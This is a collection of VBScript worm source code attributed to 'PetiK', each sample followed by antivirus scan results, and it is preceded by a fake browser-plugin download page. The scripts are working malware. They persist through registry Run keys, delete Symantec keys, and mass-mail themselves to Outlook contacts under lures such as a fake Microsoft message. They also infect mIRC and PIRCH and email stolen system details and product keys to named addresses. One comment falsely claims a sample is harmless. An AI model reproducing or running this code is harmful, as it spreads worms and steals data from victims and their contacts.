</HEAD> <BODY bgColor=black text=red onload='attente = setInterval("affiche()", 1000);'> <DIV align=center> <H1>Plugin pour Microsoft Internet Explorer</H1> <H1>Plugin for Microsoft Internet Explorer</H1> </DIV> <DIV align=left> <HR SIZE=4> <H3>Merci de télécharger le plugin dans le réperoire C:\</H3> <H3>Please download the plugin in C:\ path</H3> <HR SIZE=1> </DIV> <DIV align=center> <FORM><BIG>Téléchargement dans <INPUT size=1 value=8> secondes</BIG> </FORM></DIV></BODY></HTML>

' ' ' '

Name : VBS/mIRC/NetWork.A Author : PetiK Language : VBS Date : 29/12/2000 29/12/2000

'VBS/mIRC/NetWork.A par PetiK Dim fso,ws,file Set fso = CreateObject("Scripting.FileSystemObject") Set ws = CreateObject("WScript.Shell") set file = fso.OpenTextFile(WScript.ScriptFullName,1) vbscopie = file.ReadAll

DEBUT() Sub DEBUT() Set win = fso.GetSpecialFolder(0) RS = ("HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\NetWork") Set c = fso.GetFile(WScript.ScriptFullName) NetWork = (win&"\Network.vbs") c.Copy (NetWork) ws.RegWrite RS,NetWork 'NORTON() MIRC() ESPION() EMAIL() End Sub Sub NORTON() ws.RegDelete ("HKLM\Software\Symantec\") ws.RegDelete ("HKCU\Software\Symantec\") End Sub Sub ESPION() Set win = fso.GetSpecialFolder(0) Set A = CreateObject("Outlook.Application") Set B = A.GetNameSpace("MAPI") For Each C In B.AddressLists If C.AddressEntries.Count <> 0 Then For D = 1 To C.AddressEntries.Count Set E = C.Addressentries(D) Next End If Next ComputerName = CreateObject("WScript.NetWork").ComputerName NOM = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner") ENT = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOrganization") VER = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\Version") NUM = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\VersionNumber") REC1 = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProductName") REC2 = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProductKey") REC3 = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProductId") PPDB = ws.RegRead("HKCU\Control Panel\Desktop\Wallpaper") DDEV = ws.RegRead("HKCU\Control Panel\Desktop\ScreenSaveTimeOut") PDEM = ws.RegRead("HKCU\Software\Microsoft\Internet Explorer\Main\Start Page") DDIR = ws.RegRead("HKCU\Software\Microsoft\Internet Explorer\Download Directory") Set aze = fso.CreateTextFile ("C:\ESPION.txt",true) aze.WriteLine "Information sur l'ordinateur" aze.WriteLine "NOM DE L'ORDINATEUR : " & ComputerName aze.WriteLine "NOM D'UTILISATEUR : " & NOM aze.WriteLine "NOM DE L'ENTREPRISE : " & ENT aze.WriteLine "SYSTEME D'EXPLOITAION : " & VER & " " & NUM aze.WriteLine "NUMERO DE LICENSE : " & REC1 & " " & REC2 aze.WriteLine "NUMERO D'IDENTIFICATION : " & REC3 aze.WriteLine "PAPIER PEINT DE BUREAU : " & PPDB aze.WriteLine "L'ECRAN DE VEILLE DE DECLENCHE AU BOUT DE " & DDEV & " SECONDES" aze.WriteLine "NON DANS CARNET D'ADRESSES : " & E.Name aze.WriteLine "ADDRESSE : " & E.Address aze.WriteBlankLines(2) aze.WriteLine "Information sur internet" aze.WriteLine "LA PAGE DE DEMARRAGE EST : " & PDEM aze.WriteLine "LE DOSSIER DE TELECHARGEMENT EST : " & DDIR End Sub Sub MIRC() On Error Resume Next NET2 = ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\NetWork") script = ("C:\script.ini") Set srpt = fso.CreateTextFile(script, true)

srpt.WriteLine "[script]; par PetiK " srpt.WriteLine "n0=on 1:JOIN:#:{" srpt.WriteLine "n1= /if ( $nick == $me ) { halt }" srpt.WriteLine "n2= /dcc send $nick " & NET2 srpt.WriteLine "n3=}" srpt.Close fso.CopyFile script, "C:\mirc\script.ini" fso.CopyFile script, "C:\mirc32\script.ini" fso.CopyFile script, "C:\program files\mirc\script.ini" fso.CopyFile script, "C:\program files\mirc32\script.ini" fso.DeleteFile ("C:\script.ini") End Sub Sub EMAIL() Set OApp = CreateObject("Outlook.Application") if oapp="Outlook" then Set Mapi = OApp.GetNameSpace("MAPI") For Each AddList In Mapi.AddressLists If AddList.AddressEntries.Count <> 0 Then For AddListCount = 1 To AddList.AddressEntries.Count Set AddListEntry = AddList.AddressEntries(AddListCount) Set msg = OApp.CreateItem(0) msg.To = AddListEntry.Address msg.Subject = "NetWork Game for WINDOWS" msg.Body = "The new game for your computer arrives" msg.Attachments.Add fso.BuildPath(fso.GetSpecialFolder(0),"\Network.vbs") If msg.To <> "" Then msg.Send End If Next End If Next End if Set msg2 = OApp.CreateItem(0) msg2.BCC = "Panda34@caramail.com; Pentasm99@aol.com" msg2.Subject = "Message écrit le " & date msg2.Body = "Il était " & time msg2.Attachments.Add ("C:\ESPION.txt") msg2.Send fso.DeleteFile ("C:\ESPION.txt") End Sub

File Network.vbs received on 05.16.2009 17:59:59 (CET) Antivirus Version Last Update Result a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Petik!IK AhnLab-V3 5.0.0.2 2009.05.16 VBS/Petik AntiVir 7.9.0.168 2009.05.15 Worm/Petik.K1 Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Petik Authentium 5.1.2.4 2009.05.16 VBS/Petik.L@mm Avast 4.8.1335.0 2009.05.15 VBS:MailWorm-gen AVG 8.5.0.336 2009.05.15 I-Worm/Petik BitDefender 7.2 2009.05.16 Generic.ScriptWorm.892F765D CAT-QuickHeal 10.00 2009.05.15 VBS/Petik.L ClamAV 0.94.1 2009.05.16 Worm.VBS-14 Comodo 1157 2009.05.08 Worm.Win32.Email-Worm.Petik DrWeb 5.0.0.12182 2009.05.16 modification of W97M.Necronom eSafe 7.0.17.0 2009.05.14 VBS.Scramble. eTrust-Vet 31.6.6508 2009.05.16 VBS/Buggy F-Prot 4.4.4.56 2009.05.16 VBS/Petik.L@mm F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik Fortinet 3.117.0.0 2009.05.16 VBS/PETIK.K1 GData 19 2009.05.16 Generic.ScriptWorm.892F765D Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Petik K7AntiVirus 7.10.737 2009.05.16 Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik McAfee 5616 2009.05.15 VBS/Generic McAfee+Artemis 5616 2009.05.15 VBS/Generic McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.K1 Microsoft 1.4602 2009.05.16 Virus:VBS/Petik.K NOD32 4080 2009.05.15 probably unknown SCRIPT Norman 6.01.05 2009.05.16 VBS/GenMail.D nProtect 2009.1.8.0 2009.05.16 VBS.Petik.C@mm Panda 10.0.0.14 2009.05.16 VBS/Generic.worm PCTools 4.4.2.0 2009.05.16 VBS.Petik.K Prevx 3.0 2009.05.16 Rising 21.29.52.00 2009.05.16 Worm.Hopalong Sophos 4.41.0 2009.05.16 VBS/Petik-K Sunbelt 3.2.1858.2 2009.05.16 Symantec 1.4.4.12 2009.05.16 VBS.Pet_Tick.gen TheHacker 6.3.4.1.326 2009.05.15 TrendMicro 8.950.0.1092 2009.05.15 VBS_PETIK.K1 VBA32 3.12.10.5 2009.05.16 ViRobot 2009.5.15.1737 2009.05.15 Additional information File size: 4245 bytes MD5...: af1121c899b152b95520214e4873e466 SHA1..: 2201e0075c58deed1db798dcc1c0c9f50d7086db

' ' ' ' ' ' ' ' ' '

Name : VBS.Kadosh Author : PetiK Language : VBS Date : 06/01/2001 VBS/Kadosh.A par PandaKiller Ce fichier se copie dans le répertoire WINDOWS sous le nom de WINEXEC.EXE.VBS et dans le répertoire SYSTEM sous winRun.dll.vbs Il change la page de démarrage du WEB et met LIVE.MULTIMANIA.COM ATTENTION : Norton détècte ce programme comme le virus VBS.NewLove.A CE N'EST PAS UN VIRUS : IL NE DETRUIT RIEN

DEBUT() Sub DEBUT() Set a = CreateObject("Scripting.FileSystemObject") Set win = a.GetSpecialFolder(0) Set sys = a.GetSpecialFolder(1) Set c = a.GetFile(WScript.ScriptFullName) c.Copy(win&"\WinExec.exe.vbs") c.Copy(sys&"\WinRun.dll.vbs") INTERNET() EMAIL() msgbox "Le tour du monde en 20 jours",vbinformation End Sub ' MODIFIE LA PAGE DE DEMARRAGE D'INTERNET Sub INTERNET() Set W = Wscript.CreateObject("WScript.Shell") W.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "live.multimania.com" W.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\WinExec", "C:\WINDOWS\WinExec.exe.vbs" End Sub ' ENVOIE UNE DE SES COPIE A TOUS LES DESTINATAIRE DU CARNET D'ADRESSE Sub EMAIL() Set K = CreateObject("Outlook.Application") Set L = K.GetNameSpace("MAPI") For Each M In L.AddressLists If M.AddressEntries.Count <> 0 Then Set N = K.CreateItem(0) For O = 1 To M.AddressEntries.Count Set P = M.AddressEntries(O) If O = 1 Then N.BCC = P.Address Else N.BCC = N.BCC & "; " & P.Address End If Next N.Subject = "Le Tour du Monde" N.Body = "Voici une lettre qui va faire le tour du monde. Ouvre Vite" Set Q = CreateObject("Scripting.FileSystemObject") N.Attachments.Add Q.BuildPath(Q.GetSpecialFolder(0),"WinExec.exe.vbs") N.Send End If Next End Sub

File WinExec.exe.vbs received on 05.11.2009 07:14:12 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster Version 4.0.0.101 5.0.0.2 7.9.0.166 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.327 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6497 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.729 7.0.0.125 5611 5611 6.7.6 1.4602 4063 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.00.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.324 8.950.0.1092 3.12.10.4 2009.5.11.1728 4.6.5.0 Last Update 2009.05.11 2009.05.11 2009.05.10 2009.05.08 2009.05.10 2009.05.10 2009.05.10 2009.05.11 2009.05.09 2009.05.11 2009.05.08 2009.05.11 2009.05.10 2009.05.08 2009.05.10 2009.05.11 2009.05.10 2009.05.11 2009.05.11 2009.05.08 2009.05.11 2009.05.10 2009.05.10 2009.05.11 2009.05.10 2009.05.08 2009.05.08 2009.05.10 2009.05.10 2009.05.07 2009.05.11 2009.05.11 2009.05.11 2009.05.09 2009.05.11 2009.05.09 2009.05.11 2009.05.11 2009.05.11 2009.05.10 Result Email-Worm.Win32.Petik!IK Worm/Petik.05 Worm/Win32.Win32 VBS/Petik.W@mm VBS:MailWorm-gen I-Worm/Petik Generic.ScriptWorm.EDFACDDC VBS/Petik.W Worm.Win32.Email-Worm.Petik WORM.Virus VBS/Sodak VBS/Petik.W@mm Email-Worm.Win32.Petik VBS/Petik.M@mm Generic.ScriptWorm.EDFACDDC Email-Worm.Win32.Petik VBS.Generic.MassMailer Email-Worm.Win32.Petik VBS/Generic@MM VBS/Generic@MM Worm.Petik.05 Virus:VBS/Petik.L probably unknown SCRIPT VBS/Autorun.AP VBS.Petik.D@mm VBS.Petik.L Worm.Hopalong VBS/Petik-L VBS.LoveLetter.Var VBS_GENERIC.001 Email-Worm.Win32.Petik VBS.Worm-Family VBS.Petik.L

Additional information File size: 1683 bytes MD5...: 763d1411edc603a60b7fdd2f63d77579 SHA1..: 98fede0c3a54c7c3fd8261b44b27107f91f4fc49

' ' ' ' ' ' ' ' ' ' ' '

Name : VBS.ShowVar Author : PetiK Language : VBS Date : 17/01/2001

Copy itself to %WINDIR%\Showvar.vbs Add to registry HKLM\Software\Microsoft\Windows\CurrentVersion\Run Showvar = %WINDIR%\Showvar.vbs Spread with MIRC by writing a script. Spread via PIRCH. Spread via mail : Subject : "Salut l'ami. Ouvre vite, la chance peut tourner !!" No file attached, the code of worm is directly int the HTML code of the mail. It creats a VBS file into the WINDIR directory and run it. ' When day is 5th we can see a messagebox 'ShowVar par PetiK 21/01/2000 Dim fso,ws,file Set fso = CreateObject("Scripting.FileSystemObject") Set ws = CreateObject("WScript.Shell") Set file = fso.OpenTextFile(WScript.ScriptFullName,1) vbscopie = file.ReadAll DEBUT() Sub DEBUT() On Error Resume Next Set win = fso.GetspecialFolder(0) RUN = ("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ShowVar") Set c = fso.GetFile(WScript.ScriptFullName) ShowVar = (win&"\Showvar.vbs") c.Copy (ShowVar) ws.RegWrite RUN,ShowVar If ws.RegRead ("HKCU\Software\ShowVar\MIRC") <> "1" then Mirc "" End If If ws.RegRead ("HKCU\Software\ShowVar\PIRCH") <> "1" then Pirch "" End If if ws.regread ("HKCU\Software\ShowVar\MAIL") <> "1" then EMail() End If Divers() End Sub Function Mirc(Path) 'On Error Resume Next If Path = "" Then If fso.fileexists("c:\mirc\mirc.ini") Then Path = "c:\mirc" If fso.fileexists("c:\mirc32\mirc.ini") Then Path = "c:\mirc32" PFD = ws.regread("HKLM\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir") SV2 = ws.regread("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ShowVar") If fso.fileexists(PFD & "\mirc\mirc.ini") Then Path = PFD & "\mirc" End If If Path <> "" Then Set Script = fso.CreateTextFile(Path & "\script.ini", True) Script.writeline "[script]" Script.writeline "n0=on 1:JOIN:#:{" Script.writeline "n1= /if ( $nick == $me ) { halt }" Script.writeline "n2= /." & chr(100) & chr(99) & chr(99) & " send $nick " & SV2 Script.writeline "n3=}" Script.Close ws.RegWrite "HKCU\Software\ShowVar\MIRC", "1" End If End Function Function Pirch(path) On Error Resume Next Set fso = CreateObject("scripting.filesystemobject") Set ws = CreateObject("wscript.shell") If path = "" Then If fso.fileexists("c:\pirch\Pirch32.exe") Then path = "c:\pirch" If fso.fileexists("c:\pirch32\Pirch32.exe") Then path = "c:\pirch32" pfDir = ws.regread("HKLM\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir") SV3 = ws.regread("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ShowVar") If fso.fileexists(pfDir & "\pirch\Pirch32.exe") Then path = pfDir & "\pirch\Pirch32.exe" End If If path <> "" Then Set Script = fso.CreateTextFile(path & "\events.ini", True)

Script.WriteLine "[Levels]" Script.WriteLine "Enabled=1" Script.WriteLine "Count=6" Script.WriteLine "Level1=000-Unknowns" Script.WriteLine "000-UnknownsEnabled=1" Script.WriteLine "Level2=100-Level 100" Script.WriteLine "100-Level 100Enabled=1" Script.WriteLine "Level3=200-Level 200" Script.WriteLine "200-Level 200Enabled=1" Script.WriteLine "Level4=300-Level 300" Script.WriteLine " 300-Level 300Enabled=1" Script.WriteLine "Level5=400-Level 400 " Script.WriteLine "400-Level 400Enabled=1" Script.WriteLine "Level6=500-Level 500" Script.WriteLine "500-Level 500Enabled=1" Script.WriteLine "" Script.WriteLine "[000-Unknowns]" Script.WriteLine "UserCount=0" Script.WriteLine "EventCount=0" Script.WriteLine "" Script.WriteLine "[100-Level 100]" Script.WriteLine "User1=*!*@*" Script.WriteLine "UserCount=1" Script.WriteLine "Event1=ON JOIN:#:/" & chr(100) & chr(99) & chr(99) & " tsend $nick " & SV3 Script.WriteLine "EventCount=1" Script.WriteLine "" Script.WriteLine "[200-Level 200]" Script.WriteLine "UserCount=0" Script.WriteLine "EventCount=0" Script.WriteLine "" Script.WriteLine "[300-Level 300]" Script.WriteLine "UserCount=0" Script.WriteLine "EventCount=0" Script.WriteLine "" Script.WriteLine "[400-Level 400]" Script.WriteLine "UserCount=0" Script.WriteLine "EventCount=0" Script.WriteLine "" Script.WriteLine "[500-Level 500]" Script.WriteLine "UserCount=0" Script.WriteLine "EventCount=0" Script.Close End If ws.RegWrite "HKCU\Software\ShowVar\PIRCH", "1" End Function Function EMail() On Error Resume Next Set fso = CreateObject("scripting.filesystemobject") Set Outlook = CreateObject("Outlook.Application") If Outlook = "Outlook" Then Set Myself = fso.opentextfile(wscript.scriptfullname, 1) I = 1 Do While Myself.atendofstream = False MyLine = Myself.readline Code = Code & Chr(34) & " & vbcrlf & " & Chr(34) & Replace(MyLine, Chr(34), Chr(34) & "&chr(34)&" & Chr(34)) Loop Myself.Close htm = "<HTML><HEAD><META content=" & Chr(34) & " & chr(34) & " & Chr(34) & "text/html; charset=iso-8859-1" & Chr(34) & " http-equiv=Content-Type><META content=" & Chr(34) & "MSHTML 5.00.2314.1000" & Chr(34) & " name=GENERATOR><STYLE></STYLE></HEAD><BODY bgColor=#ffffff><SCRIPT language=vbscript>" htm = htm & vbCrLf & "On Error Resume Next" htm = htm & vbCrLf & "Set fso = CreateObject(" & Chr(34) & "Scripting.FileSystemObject" & Chr(34) & ")" htm = htm & vbCrLf & "If Err.Number <> 0 Then" htm = htm & vbCrLf & "document.write " & Chr(34) & "<font face='verdana' color=#ff0000 size='2'>Pour lire cet EMail, merci d'activer l'option ActiveX.<br>Rouvrez ce message et accepter les ActiveX<br>Microsoft Outlook</font>" & Chr(34) & "" htm = htm & vbCrLf & "Else" htm = htm & vbCrLf & "Set vbs = fso.CreateTextFile(fso.GetSpecialFolder(1) & " & Chr(34) & "\Worm.vbs" & Chr(34) & ", True)" htm = htm & vbCrLf & "vbs.write " & Chr(34) & Code & Chr(34) htm = htm & vbCrLf & "vbs.Close" htm = htm & vbCrLf & "Set ws = CreateObject(" & Chr(34) & "wscript.shell" & Chr(34) & ")" htm = htm & vbCrLf & "ws.run fso.GetSpecialFolder(0) & " & Chr(34) & "\wscript.exe " &

Chr(34) & " & fso.getspecialfolder(1) & " & Chr(34) & "\Worm.vbs %" & Chr(34) & "" htm2 = htm2 & vbCrLf & "document.write " & Chr(34) & "Ce message contient de nombreux erreurs.<br>Désolé !<br>" & Chr(34) & "" htm2 = htm2 & vbCrLf & "End If" htm2 = htm2 & vbCrLf & "<" & "/SCRIPT></" & "body></" & "html>" HtmlBody = htm & htm2 Set mapi = Outlook.GetNameSpace("MAPI") For Each Addresslist In mapi.AddressLists If Addresslist.AddressEntries.Count <> 0 Then AddCount = Addresslist.AddressEntries.Count Set Msg = Outlook.CreateItem(0) Msg.Subject = "Salut l'ami. Ouvre vite, la chance peut tourner !!" Msg.HtmlBody = HtmlBody Msg.DeleteAfterSubmit = True For II = 1 To AddCount Set Addentry = Addresslist.AddressEntries(II) If AddCount = 1 Then Msg.BCC = Addentry.Address Else Msg.BCC = Msg.BCC & "; " & Addentry.Address End If Next Msg.send End If Next Outlook.Quit End If ws.regwrite "HKCU\Software\ShowVar\MAIL", "1" End Function Function Divers() If Day(Now()) = 5 Then MsgBox "Et si on faisait une partie d'echec ?",vbinformation,"WarGames" End If AZE = ws.RegRead ("HKCR\txtfile\DefaultIcon") ws.RegWrite "HKCR\VBSfile\DefaultIcon\",AZE End Function

File ShowVar.vbs received on 05.16.2009 19:40:46 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster Version 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.737 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0 Last Update 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 Result VBS.Lee.Based!IK VBS/Lee Worm/Lee.Based.2 Worm/VBS.Lee-based VBS/Pica.Q VBS:Malware-gen VBS/Level Generic.ScriptWorm.A5CDC117 VBS/Pica.Q WORM.Virus VBS.Petick. VBS/VBSWG!generic VBS/Pica.Q Email-Worm.VBS.Lee-based VBS/Petik.E@mm Generic.ScriptWorm.A5CDC117 VBS.Lee.Based Email-Worm.VBS.Lee-based MIRC/Generic MIRC/Generic Worm.Lee.Based.2 Virus:VBS/Petik.E VBS/Pica.Q VBS/Lee-based.K VBS.Lee.A VBS.Petik.E Unknown Script Virus Mal/VBSMail-A VBS.LoveLetter.Var VBS.Petik.E

Additional information File size: 6557 bytes MD5...: b4a5df075e6d5278036e07be004b3e09 SHA1..: e757ae3f2a165cdb1861c8c8743bd0f76c28d606

' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' '

Name : VBS/Outlook/mIrc/PIRCH/PetiK.A Author : PetiK Language : VBS Date : 30/01/2001 Taille : 9766 octets Il se copie dans le dossier WINDIR sous le nom de PetiK.txt.vbs Pour cacher cela, il modifiera l'icône des .VBS en .TXT Il infecte ensuite mIRC. Il cherche le dossier par défaut où se trouve le fichier MIRC.INI. Si il le trouve, il crée à l'intérieur du dossier un fichier SCRIPT.INI Il infecte ensuite PIRCH de la même manière. Pour le logiciel Outlook, il va écrire son code à l'intérieur du message en VBScript De telle sorte que le virus s'active dès la lecture du message. Il envoie également différentes informations, à deux adresses : petik@caramail.com et ppetik@hotmail.com. Les informations sont : - Nom de l'utilisateur et de l'Organisation - Le nom de l'ordinateur - Le pays - La version et le numéro de WINDOWS - Le numéro d'identification - Le numéro d'enregistrement - La page de démarrage d'Internet Explorer - Le dossier de téléchargement - Le nom de dossier de WINDOWS, SYSTEM, TEMPORAIRE et de PROGRAM FILES Et envoie tous cela avec comme sujet : Message pour PetiK de XXX où XXX est le nom d'Utilisateur Le message envoyé aux autres personnes est : " Important Message From Micrsoft Corporation " Il infecte ensuite les fichiers en fonction de leur extension. VBS et VBE : écrit le code du virus à l'intérieur. JS et JSE : écrit le code et change l'extension : file.js => file.vbs EXE, INI, GIF, JPG et HTM : créer un nouveau fichier .VBS avec code du virus MP3, DOC, XLS, PPT et HLP : met l'attribut caché

'VBS/Outlook/mIrc/PIRCH/PetiK.A par PetiK Dim fso,ws,file Set fso = CreateObject("Scripting.FileSystemObject") Set ws = CreateObject("WScript.Shell") Set file = fso.OpenTextFile(WScript.ScriptFullName,1) vbscopie = file.ReadAll DEBUT() Sub DEBUT() On Error Resume Next Set win = fso.GetspecialFolder(0) RUN = ("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\PetiK") Set c = fso.GetFile(WScript.ScriptFullName) PetiK = (win&"\PetiK.txt.vbs") c.Copy (PetiK) ws.RegWrite RUN,PetiK VBSI = ws.RegRead ("HKCR\VBSFile\DefaultIcon\") TXTI = ws.RegRead ("HKCR\txtfile\DefaultIcon\") ws.RegWrite "HKLM\Software\PetiK\ICONE VBS",VBSI ws.RegWrite "HKCR\VBSFile\DefaultIcon\",TXTI If ws.RegRead ("HKLM\Software\PetiK\") <> "OK" Then EMail() End If If ws.RegRead ("HKLM\Software\PetiK\MIRC") <> "OK" then Mirc "" End If If ws.RegRead ("HKLM\Software\PetiK\PIRCH") <> "OK" then Pirch "" End If lecteur() End Sub Function EMail() On Error Resume Next Set fso = CreateObject("scripting.filesystemobject") Set Outlook = CreateObject("Outlook.Application") If Outlook = "Outlook" Then Set Myself = fso.opentextfile(wscript.scriptfullname, 1) I = 1 Do While Myself.atendofstream = False MyLine = Myself.readline Code = Code & Chr(34) & " & vbcrlf & " & Chr(34) & Replace(MyLine, Chr(34), Chr(34) & "&chr(34)&" & Chr(34)) Loop

Myself.Close htm = "<HTML><HEAD><META content=" & Chr(34) & " & chr(34) & " & Chr(34) & "text/html; charset=iso-8859-1" & Chr(34) & " http-equiv=Content-Type><META content=" & Chr(34) & "MSHTML 5.00.2314.1000" & Chr(34) & " name=GENERATOR><STYLE></STYLE></HEAD><BODY bgColor=#ffffff><SCRIPT language=vbscript>" htm = htm & vbCrLf & "On Error Resume Next" htm = htm & vbCrLf & "Set fso = CreateObject(" & Chr(34) & "Scripting.FileSystemObject" & Chr(34) & ")" htm = htm & vbCrLf & "If Err.Number <> 0 Then" htm = htm & vbCrLf & "document.write " & Chr(34) & "<font face='verdana' color=#ff0000 size='2'>You need ActiveX enabled if you want to see this EMail.<br>Please open this message again and click accept ActiveX<br>Microsoft Outlook</font>" & Chr(34) & "" htm = htm & vbCrLf & "Else" htm = htm & vbCrLf & "Set vbs = fso.CreateTextFile(fso.GetSpecialFolder(1) & " & Chr(34) & "\Worm.vbs" & Chr(34) & ", True)" htm = htm & vbCrLf & "vbs.write " & Chr(34) & Code & Chr(34) htm = htm & vbCrLf & "vbs.Close" htm = htm & vbCrLf & "Set ws = CreateObject(" & Chr(34) & "wscript.shell" & Chr(34) & ")" htm = htm & vbCrLf & "ws.run fso.GetSpecialFolder(0) & " & Chr(34) & "\wscript.exe " & Chr(34) & " & fso.getspecialfolder(1) & " & Chr(34) & "\Worm.vbs %" & Chr(34) & "" htm2 = htm2 & vbCrLf & "document.write " & Chr(34) & "This message has permanent errors.<br>Sorry<br>" & Chr(34) & "" htm2 = htm2 & vbCrLf & "End If" htm2 = htm2 & vbCrLf & "<" & "/SCRIPT></" & "body></" & "html>" HtmlBody = htm & htm2 Set mapi = Outlook.GetNameSpace("MAPI") For Each Addresslist In mapi.AddressLists If Addresslist.AddressEntries.Count <> 0 Then AddCount = Addresslist.AddressEntries.Count Set Msg = Outlook.CreateItem(0) Msg.Subject = "Important Message From Microsoft Corporation" Msg.HtmlBody = HtmlBody Msg.DeleteAfterSubmit = True For II = 1 To AddCount Set Addentry = Addresslist.AddressEntries(II) If AddCount = 1 Then Msg.BCC = Addentry.Address Else Msg.BCC = Msg.BCC & "; " & Addentry.Address End If Next Msg.send End If Next Set msg2 = Outlook.CreateItem(0) ComputerName = CreateObject("WScript.NetWork").ComputerName NOM = ws.RegRead ("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner") ENT = ws.RegRead ("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOrganization") VER = ws.RegRead ("HKLM\Software\Microsoft\Windows\CurrentVersion\Version") NUM = ws.RegRead ("HKLM\Software\Microsoft\Windows\CurrentVersion\VersionNumber") REC1 = ws.RegRead ("HKLM\Software\Microsoft\Windows\CurrentVersion\ProductId") REC2 = ws.RegRead ("HKLM\Software\Microsoft\Windows\CurrentVersion\ProductKey") PFD = ws.RegRead ("HKLM\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir") PDEM = ws.RegRead ("HKCU\Software\Microsoft\Internet Explorer\Main\Start Page") DDIR = ws.RegRead ("HKCU\Software\Microsoft\Internet Explorer\Download Directory") PAYS = ws.RegRead ("HKCU\Software\Microsoft\Internet Explorer\International\AcceptLanguage") WINDIR = fso.GetSpecialFolder(0) SYSDIR = fso.GetSpecialFolder(1) TMPDIR = fso.GetSpecialFolder(2) msg2.BCC = "petik@caramail.com;ppetik@hotmail.com" msg2.Subject = "Message pour PetiK de " & NOM m2 = "-Information :" m2 = m2 & vbCrLf & "Date : " & date m2 = m2 & vbCrLf & "Heure : " & time m2 = m2 & vbCrLf & "NOM DE L'ORDINATEUR : " & ComputerName m2 = m2 & vbCrLf & "ENTREPRISE : " & ENT m2 = m2 & vbCrLf & "PAYS : " & PAYS m2 = m2 & vbCrLf & "SYSTEME D'EXPLOITATION : " & VER & " " & NUM m2 = m2 & vbCrLf & "NUMERO D'IDENTIFICATION : " & REC1 m2 = m2 & vbCrLf & "NUMERO D'ENREGISTREMENT : " & REC2 m2 = m2 & vbCrLf & "PAGE DE DEMARRAGE : " & PDEM m2 = m2 & vbCrLf & "DOSSIER DE TELECHARGEMENT : " & DDIR m2 = m2 & vbCrLf & "DOSSIER WINDOWS : " & WINDIR m2 = m2 & vbCrLf & "DOSSIER SYSTEME : " & SYSDIR m2 = m2 & vbCrLf & "DOSSIER TEMPORAIRE : " & TMPDIR m2 = m2 & vbCrLf & "DOSSIER PROGRAM FILES : " & PFD

